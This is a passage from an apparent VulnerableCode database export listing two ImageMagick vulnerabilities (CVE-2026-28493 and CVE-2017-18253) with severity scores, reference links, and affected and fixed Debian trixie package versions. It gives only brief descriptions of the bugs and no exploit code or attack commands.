exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ypyd-2tg4-xqb1

url VCID-zpcy-nms7-kuha

vulnerability_id VCID-zpcy-nms7-kuha

summary

ImageMagick has Integer Overflow leading to out of bounds write in SIXEL decoder
An integer overflow vulnerability exists in the SIXEL decoer. The vulnerability allows an attacker to perform an out of bounds via a specially crafted mage.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28493.json

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28493.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-28493

reference_id

reference_type

scores

value	0.00055
scoring_system	epss
scoring_elements	0.17414
published_at	2026-04-08T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17322
published_at	2026-04-07T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17474
published_at	2026-04-09T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17542
published_at	2026-04-04T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17495
published_at	2026-04-02T12:55:00Z

value	0.0006
scoring_system	epss
scoring_elements	0.18975
published_at	2026-04-11T12:55:00Z

value	0.0006
scoring_system	epss
scoring_elements	0.18725
published_at	2026-04-26T12:55:00Z

value	0.0006
scoring_system	epss
scoring_elements	0.18746
published_at	2026-04-24T12:55:00Z

value	0.0006
scoring_system	epss
scoring_elements	0.18858
published_at	2026-04-21T12:55:00Z

value	0.0006
scoring_system	epss
scoring_elements	0.18843
published_at	2026-04-18T12:55:00Z

value	0.0006
scoring_system	epss
scoring_elements	0.1883
published_at	2026-04-16T12:55:00Z

value	0.0006
scoring_system	epss
scoring_elements	0.18877
published_at	2026-04-13T12:55:00Z

value	0.0006
scoring_system	epss
scoring_elements	0.18928
published_at	2026-04-12T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-28493

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	8.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r39q-jr8h-gcq2

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T17:16:54Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r39q-jr8h-gcq2

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-28493

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-28493

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2445883
reference_id	2445883
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2445883

reference_url

https://github.com/advisories/GHSA-r39q-jr8h-gcq2

reference_id

GHSA-r39q-jr8h-gcq2

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-r39q-jr8h-gcq2

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-28493, GHSA-r39q-jr8h-gcq2

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zpcy-nms7-kuha

url VCID-zsxa-yvp8-93fr

vulnerability_id VCID-zsxa-yvp8-93fr

summary ImageMagick: NULL pointer dereference LoadOpenCLDevices function in MagickCore/opencl.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-18253.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-18253.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2017-18253

reference_id

reference_type

scores

value	0.00379
scoring_system	epss
scoring_elements	0.59276
published_at	2026-04-01T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.5935
published_at	2026-04-02T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.59373
published_at	2026-04-04T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.5934
published_at	2026-04-07T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.59391
published_at	2026-04-08T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.59405
published_at	2026-04-09T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.59423
published_at	2026-04-11T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.59407
published_at	2026-04-12T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.59388
published_at	2026-04-13T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.5942
published_at	2026-04-16T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.59427
published_at	2026-04-18T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.59408
published_at	2026-04-21T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.59384
published_at	2026-04-24T12:55:00Z

value	0.00379
scoring_system	epss
scoring_elements	0.59404
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2017-18253

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1561743
reference_id	1561743
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1561743

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2017-18253

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zsxa-yvp8-93fr

Risk_score null

Resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

Package Instance